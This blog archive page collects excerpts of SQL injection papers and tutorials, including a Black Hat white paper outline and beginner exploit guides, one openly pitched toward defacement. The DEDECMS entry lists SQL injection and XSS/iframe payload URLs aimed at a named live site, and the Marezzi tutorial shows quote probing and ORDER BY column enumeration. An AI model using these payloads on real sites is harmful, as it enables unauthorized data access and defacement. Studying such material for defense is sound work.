Archive

Posts tagged 'SQL Injection'

Advanced SQL injection to operating system full control

February 17, 2011 admin     1,593 views No comments

From: http://www.blackhat.com/presentations/bh-europe-09/Guimaraes/Blackhat-europe-09-Damele-SQLInjection-slides.pdf

Advanced SQL injection to operating system full control
Bernardo Damele Assumpção Guimarães
bernardo.damele@gmail.com
April 10, 2009

This white paper discusses the security exposures of a server that occur due to a SQL injection flaw in a web application that communicates with a database.
Over ten years have passed since a famous hacker coined the term SQL injection, and it is still considered one of the major application threats. A lot has been said on this vulnerability, but not all of its aspects and implications have been uncovered yet.
This paper's aim is to collate some of the existing knowledge, introduce new techniques and demonstrate how to get complete control over the database management system's underlying operating system, file system and internal network through a SQL injection vulnerability in overlooked and theoretically not exploitable scenarios.

Contents
I Introduction
1 SQL injection
2 Web application scripting languages
2.1 Batched queries
3 Batched queries via SQL injection
3.1 MySQL
3.2 PostgreSQL
3.3 Microsoft SQL Server

II File system access
4 Read access
4.1 MySQL
4.2 PostgreSQL
4.3 Microsoft SQL Server
5 Write access
5.1 MySQL
5.2 PostgreSQL
5.3 Microsoft SQL Server
III Operating system access
6 User-Defined Function
7 UDF injection
7.1 MySQL
7.1.1 Shared library creation
7.1.2 SQL injection to command execution
7.2 PostgreSQL
7.2.1 Shared library creation
7.2.2 SQL injection to command execution
8 Stored procedure
8.1 Microsoft SQL Server
8.1.1 xp_cmdshell procedure
8.1.2 SQL injection to command execution

IV  Out-of-band connection
9 Stand-alone payload stager
9.1 Payload stager options
9.2 Session
10 SMB relay attack
10.1 Universal Naming Convention
10.2 Abuse UNC path requests
10.2.1 MySQL
10.2.2 PostgreSQL
10.2.3 Microsoft SQL Server

11 Stored procedure buffer overflow
11.1 Exploit
11.2 Memory protection
11.3 Bypass DEP

V Privilege escalation
VI Conclusion
12 Acknowledgments
Read more…

[zz] DEDECMS V5.6 GBK injection vulnerability

April 12, 2010 admin     1,997 views No comments

DEDECMS is finally about to release 5.6, looking forward to it... There was no way to download the program, so I did a black-box test,
and for now I can't analyze any further...
Well,
the member center home page (../member/index.php) filters its function input loosely, causing blind injection, database error mode, and XSS.
Test site: http://zz.5u.cn

=============================================
| # Title    : DEDECMS V5.6 GBK SQL injection Vulnerability
| # Author   : Akira
| # email    : MCAkira@HotMail.CoM
| # Home     : [url]http://www.hackclub.net[/url]
| # Web Site : [url]http://zz.u5.cn[/url]
| #Download: [url]http://www.dedecms.com[/url]
| # Dork     : Powered By DEDECMS.COM © 2004-2010 DEDECMS Inc.
| # Tested on: Microsoft Windows XP SP2  + Linux (debian 5.0)
| # Bug      :SQL injection ,XSS
==================== Exploit By Akira================

http://zz.5u.cn/member/index.php?uid=’%20||%20”%20||%20′%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7

http://zz.5u.cn/member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7WFXSSProbe’”)/>

http://zz.5u.cn/member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7′”><iframe%20src=http://www.milsec.net>

Authentication Bypass – Login form SQL Injection and magic_quotes Bypass

April 3, 2010 admin     5,415 views No comments

From & PDF download: http://www.exploit-db.com/download_pdf/11956

Authentication Bypass – SQL Injection and magic_quotes

Auth Bypass by J0hn.X3r and novaca!ne
# Date: 30.03.2010
# Author: novaca!ne
# Website: j0hnx3r.org novacaine.biz
# Contact: J0hn.X3r@free-hack.com novacaine@no-trace.cc
1. Introduction
2. What is Auth Bypass
3. How to exploit it
4. Bypass magic_quotes
5. How to fix it
6. Shouts
Introduction
Dear Reader, this paper is about "Auth Bypass".
It was written by J0hn.X3r and edited by novaca!ne
(see the original version here: http://j0hnx3r.org/?p=55 ).
You can use this simple technique to pentest your own website or when you forgot your own password.
It was written to share knowledge; knowledge should be free and available for everyone.
What is Auth Bypass
"Auth Bypass" is the short form of "Authorization Bypass."
An Auth Bypass flaw comes up every time a website doesn't filter the attacker's input.
It deals with SQL command injection.

Read more…

SQL Injection Tutorial

March 31, 2010 xion     2,080 views No comments

# Exploit Title: [paper] Tutorial SQL injection secara ringkas
# Date: January 19th, 2010
# Author: r3v3r7
# Greetz: n3wb0rn, hmsec, tbdsec…
# Language: Bahasa Melayu
   
————————————————————————————–
     Introduction:
————————————————————————————–

Defacement? Cool, isn't it? How is it done? But first, what are SQL and SQL injection? OK, SQL is Structured Query Language. It is pronounced es-q-el and not sequel (many people pronounce it that way)... SQL is actually used for relational database management system, database schema creation and modification, and database object access control management.

    OK, SQL injection, in turn, is a technique for producing an error on a website... for example, 1=1 is TRUE and 1=0 is FALSE, so a TRUE statement will be used to display the content of that site, and if the statement is FALSE, the site will not display the content it should...

    How do you make a site display a FALSE statement? Actually, it depends on whether the site has been patched/filtered against the vuln, bug, error or exploit...

    And how do you find out whether a site has a vuln/bug? Many methods can be used, such as a vuln scanner, Google dorks (depends on luck), bots, and so on...

Read more…

SQL Injection

March 31, 2010 xion     1,705 views No comments

Source: exploit-db.com

 By Twi John
—————-

First I want to show you a site where you can find out more about new vulnerabilities and how to protect yourself from web vulnerabilities.

http://www.owasp.org/

In this lesson we will be learning SQLi, but this time we will be querying the MySQL database to obtain login and password information.

Here is the site: www.site.com.br/noticias.php?id=10

To find out whether it might be vulnerable, put ' after the link; if it gives some error, there is a good chance it is vulnerable.

    www.site.com.br/noticias.php?id=10'

  Read more…

MySQL: Secure Web Apps – SQL Injection techniques

March 29, 2010 admin     9,368 views No comments

/================================================================================\
———————————[ PLAYHACK.net ]———————————
\================================================================================/

-[ INFOS ]———————————————————————–
Title: “MySQL: Secure Web Apps – SQL Injection techniques”
Author: Omni
Website: http://omni.playhack.net
Date: 2009-02-26 (ISO 8601)
———————————————————————————

-[ SUMMARY ]———————————————————————
0x01: Introduction
0x02: Injecting SQL
0x03: Exploiting a Login Form
0x04: Exploiting Different SQL Statement Types
0x05: Basic Victim Fingerprinting
0x06: Standard Blind SQL Injection
0x07: Double Query
0x08: Filters Evasion
0x09: SQL Injection Prevention
0x10: Conclusion
———————————————————————————

Read more…

Category: Penetration testing

Classic MySQL injection tutorial

March 29, 2010 admin     1,897 views No comments
SQL Injection Tutorial by Marezzi (MySQL)
From milw0rm.com
In this tutorial I will describe how SQL injection works and how to
use it to get some useful information.
First of all: what is SQL injection?
It's one of the most common vulnerabilities in web applications today.
It allows an attacker to execute database queries through the URL and gain access
to some confidential information, etc. (in short).
1. SQL Injection (classic or error-based, or whatever you call it) :D
2. Blind SQL Injection (the harder part)
So let's start with some action :D
1). Check for vulnerability
Let's say that we have some site like this
http://www.site.com/news.php?id=5
Now, to test whether it is vulnerable, we add ' (a quote) to the end of the URL,
and that would be http://www.site.com/news.php?id=5'
so if we get some error like
"You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right etc..."
or something similar,
that means it is vulnerable to SQL injection :)
2). Find the number of columns
To find the number of columns we use the ORDER BY clause (it tells the database how to order the result).
So how do we use it? Well, just increment the number until we get an error.
http://www.site.com/news.php?id=5 order by 1/* <-- no error
http://www.site.com/news.php?id=5 order by 2/* <-- no error
http://www.site.com/news.php?id=5 order by 3/* <-- no error
http://www.site.com/news.php?id=5 order by 4/* <-- error (we get a message like Unknown column '4' in 'order clause' or something like that)
That means it has 3 columns, because we got an error on 4.